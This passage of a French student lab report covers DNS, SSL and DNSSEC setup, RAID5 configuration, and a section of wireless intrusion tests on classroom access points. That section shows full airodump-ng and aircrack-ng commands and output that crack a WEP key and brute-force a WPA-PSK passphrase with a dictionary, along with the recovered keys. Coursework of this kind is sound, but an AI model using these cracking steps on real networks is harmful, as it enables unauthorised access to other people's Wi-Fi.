root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avions une erreur à propos du subsystem. Pour que cela fonctionne, il nous manquait la commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install linux-image-3.16.0-4-amd64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de la machine, nous créons le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mkfs /dev/md0&lt;br /&gt;
root@GreenArrow:~# mkdir /datamd0&lt;br /&gt;
root@GreenArrow:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 13:20:27 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
